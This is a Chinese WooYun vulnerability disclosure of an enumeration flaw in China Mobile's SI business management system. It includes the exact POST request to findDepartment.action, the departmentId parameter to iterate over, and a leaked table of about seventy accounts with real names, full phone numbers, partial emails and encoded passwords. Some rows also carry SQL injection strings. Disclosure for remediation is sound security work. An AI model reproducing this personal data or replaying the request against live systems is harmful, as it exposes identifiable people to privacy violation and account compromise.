当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0215025

漏洞标题:中国移动si业务管理系统漏洞可影响大量用户信息(账号/姓名/手机/邮箱/密码等)

相关厂商:中国移动

漏洞作者: BMa

提交时间:2016-06-01 14:04

修复时间:2016-07-18 10:50

公开时间:2016-07-18 10:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-01: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开

简要描述:

泄露用户所有信息、账号、姓名、手机、邮箱、密码

详细说明:

注册个账号后,http://**.**.**.**/si/portal/register.jsp

3.png


然后有这么一个请求

POST /server/auth/findDepartment.action HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/si/auth/individual/modifyInfo.jsp
Content-Length: 81
Cookie: JSESSIONID=1A377EC122C2A8227B6A7CF45563F33D
X-Forwarded-For: **.**.**.**
Connection: close
department.departmentId=1016481&ticket=1A377EC122C2A8227B6A7CF45563F33D&domain=si


然后可以遍历

1.png


泄露的信息,

2.png


Payload	"loginName":"	"mobile":"	"password":"	"realName":"	"email":"	Comment
1016621 进学科技 18813396658 CeISzPMC2oO4nU9WFUNQ\/Q== 进学科技 303963631@**.**.**.**
1016301 讯宇创世 13621097201 iGlWz5LuREiprjVCAiHbiA== 北京讯宇创世科技有限公司 cmgame@**.**.**.**
1016681 测试1006 15815352980 ZDIaYXYBbhr8cpDG5tY+8Q== 测试账号 359976215@**.**.**.**
1016723 泉龙达科技 13516205707 KJbjdP5gykFLm0JWvvWUzg== quanlongda 13516205707@**.**.**.**
1016722 泉龙达 13516205707 7lc6DxnLTqqVJMY+wZVgOg== quanlongda 13516205707@**.**.**.**
1016421 企业闪信-景心 15022201502 qHg+qyGTkbDWbP2gxyVccw== 裴玲艳 peilingyan@**.**.**.**
1016781 zhubing1225 13668676669 P9nDLMzDErI69q4hVisVQw== 122500 178765322@**.**.**.**
1016161 zhongxingwangka 13602128111 Y4V1f1qAiVE+OF7bgS8LNg== zhongxingwangka oper1@**.**.**.**
1016361 zhaoxfa 18832684116 7X110ojWIOFodjucaMA\/lQ== 赵小飞 951288307@**.**.**.**
1015901 zhangwei 15218848009 6QwNLmgNjG69\/1M\/8klGbA== zhangwei 294660560@**.**.**.**' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL--
1015841 z123456 18896724354 o9vP55LnoGaqBWQVy3qmnA== z123456 123@**.**.**.**
1015922 yanduwei 13911943880 S5dxthIwcYbfpEc9Its39A== yanduwei 276860265@**.**.**.**
1016061 wshh2008 15182011250 ZOzKC39Bp4pXpQj3giWdpQ== haha 395003125@**.**.**.**
1016102 wenhao 13548839276 nQ4E\/Zs2tm4Ocr72v2GR3g== wenhao 1769491495@**.**.**.**
1016263 wangqihua 15880229257 QREKrGkgkylK61Mcy209WQ== 中国移动通信福建有限公司 360429197@**.**.**.**
1016541 tjsckj 13622132507 GgLpX94IDfj7ZF\/DlE0uNQ== shengchuang yudejiang@**.**.**.**
1016121 tester017 13148375348 ixs3lKoOJQT3Hxu6hRgZTg== tester017 iopiop121@**.**.**.**
1016463 test2 15294567856 rX\/QAx5z67PYIq6XIPjqpg== test2 test@**.**.**.**
1015881 test123456 13434231234 XsS48YTyTRBeUcespeyHvg== masaya tktktktk0001@**.**.**.**
1015941 test1 15034518061 4uieWn2tMmSiIX8omL14Pw== 发送到 admin@**.**.**.**
1016701 szsqld 13554915786 Y7v2SyFEqFG1eufU1sXVYA== 深圳市泉龙达科技发展有限公司 13554915786@**.**.**.**
1016783 sunzhix 15263321415 K\/Zo5bqjwKhmFEkFCG13Pg== 孙志祥 15263321415@**.**.**.**
1016721 slyslan 15060316212 8gB+t71sH8eWIKk4XYVNww== slyslan 418222920@**.**.**.**
1016201 sis1975 13904513134 Q8kPHlN2XNdd86iPRUrcIg== 网络运营 1712347309@**.**.**.**
1016801 sim_admin 13718580212 944t\/HSlXQWSado+0S65Ig== sunyu 1608489185@**.**.**.**
1016401 shenhongjian 13967225961 7OC3UfnoeZdzrWeMamdqUA== shenhongjian 954059412@**.**.**.**
1016822 nstest2 13811111111 i4ZCznTk8jYEE8U5UeFFHQ== nstest2 10001@**.**.**.**
1016821 nstest 13811111111 vj3dBP1vke26OaY035OU2Q== nstest2 10001@**.**.**.**
1015782 nbl1986 15000554866 V1McDH8ucD8cSJnCkIHhnQ== 1 58569600@**.**.**.**
1016841 mykjava2 13825612079 kF4uWtkMQWpgr24YrOLUHw== mykjava2 thinkyou123@**.**.**.**
1016181 lywswyk 13583108972 Cy\/kwQ8fPM6VdWW0EAR2Aw== lywswyk lywswyk@**.**.**.**
1016601 loveCS1763 13528212007 bZYR3bAiKD8mnWjVWm6IJQ== loveCS1763 loveCS1763@163.COM
1016521 lirk.jsyt 13956325007 pjenJK3ie5ADYbMJPJQ4SQ== jeoco_lirk lirk.jsyt@**.**.**.**
1016381 kissxxzz 13911139733 Qt3leMO0Xbx+9HQv\/2RfWA== hlj 2016hyh@**.**.**.**
1016661 jiaoxiang 18252121859 rgCNC+6JsRER7V2Ih9+oZg== jiaoxiang jiaoxl1986@**.**.**.**
1015981 jiangsenxing 15961705638 9oDaCo20G5XHm70+RHsfiw== 蒋森兴 1149785673@**.**.**.**
1016281 hujiashun 18858360175 4z0q16ok0ljeAoG8dEuFww== hujiashun 1096024041@**.**.**.**
1016441 hubeillwy 13995777715 FG7VXATANx29\/Lizvv5jcw== 湖北联利伟业 lijian@**.**.**.**
1016561 huangxiaohui 13849612123 GQ6723zegGniaHl\/5IXerg== huangxiaohui huangxiaohui@**.**.**.**
1016782 huanggua 15911111111 xr\/Bxseo87VIvw3A7eBKug== huanggua 123@**.**.**.**
1016241 heshiwo 13521202355 fZ3qfNYQZ5PsxaiG7Q\/oAA== heshiwo 13521202355@**.**.**.**
1016641 djl1122 15285911190 CIkHWubsPdFDSXY1Xxmg+w== 抢油 593143291@**.**.**.**
1015801 cla2101 18852486269 Z+e3Zzc6Yh22OnaW7+Ze8g== 书生 clcumt@**.**.**.**
1016101 cj858cj 15010028119 e37s9S4CmnPbM2JQ0Ku2qA== 陈金秋 719991984@**.**.**.**
1016461 chongfeng 13926600450 NlUEqqQuKLk7mNXqJEeLkA== chongfeng 1662331663@**.**.**.**
bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 blackmanba.china@**.**.**.**
1016861 bma123 18888888888 2wnJ5Ef9RH3a2alWhtKJJQ== 李辉 blackmanba.china@**.**.**.**
1015961 ak47 15219118952 Ywr4HoEQE3ZShShgAexIXg== ak47 1@**.**.**.**
1016462 adminaa 15189658965 ijxvJr0NAd8VumT\/io4edA== adminaa 58965@**.**.**.**
1016262 admin2 15845454545 3N5INq8n64wdMAes78F9Vg== 123 dasd@**.**.**.**
1016321 admin1 13875467890 OoJxQp8a\/Osl1k7Rwfw33A== 1234532 123@**.**.**.**
1015921 aa17951 15929807202 p6VBBpZ7noQxT05+UazKow== aaqqww 15929807202@**.**.**.**
1016042 979091907 13936027352 T5AizXVVPQnxflzuIdXJjg== 李强 979091907@**.**.**.**
1016581 2766118665 18216678939 6Nr7KvQNnyOO7A6XN6gO3Q== 诸城代理商 2766118665@**.**.**.**
1016001 204930 15049133333 Fv7M4AmS8NsJOvZyuqv\/RA== 204930 2859515123@**.**.**.**
1016041 1q 13843723521 Isv+O\/af0mXsFxFFXmAuOA== q1 138@**.**.**.**
1016761 1979376171 15845317539 XS\/EFF3H+Z+\/L8NwTiuIVQ== Sunday 1979376171@**.**.**.**
1016081 18799889778 13899159892 QDjuS2h2mwhrNaRiKlVbuw== 18799889778 1419056902@qq.COM
1016021 18701256780 15229393711 b7JzgOV3gNp7bYRu4qzbrA== 武三刚 18701256780@**.**.**.**
1015821 18283823693 18283823693 khHcAZllpIHxxA4FgBZoMw== shimin 125832760@**.**.**.**
1016261 15880228257 15845454545 e+LNiQQBEIpF3EuFTgzIwg== admin2' dasd@**.**.**.**
1016501 15834726140 15834726140 ltDPXYKN59kguPW7jdN\/Kg== 李佳霖 2424326858@QQ.COM
1016221 15138776956 15138776956 sQIowoMKkEalUtSE\/dgAqQ== 谷旭娜 121836747@**.**.**.**
1016741 13516003391 13516003391 r7Y3VOhGxCwrBRDplDATVQ== z1290421091 1290421091@**.**.**.**
1016141 13479690747 13479690747 VbIVJswIvOwd891tYMuOKw== 承诺 10714886@**.**.**.**
1015861 13476003630 13476003630 SKQ5Kv1PRPbw3wdq\/s57vA== sgz 13476003630@**.**.**.**
1016341 123 13800013800 ZKzJWdQgEP9LW8qI1MfPWA== 123 123@**.**.**.**
1016481 1005011194 15825928568 OFpxWgDuOXocWWm\/dZBiUA== Andy 1005011194@**.**.**.**

漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2016-06-03 10:48

厂商回复:

CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无


漏洞评价:

评价

  1. 2016-06-03 11:41 | 李旭敏 ( 普通白帽子 | Rank:866 漏洞数:120 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    我一直以为你也是移动的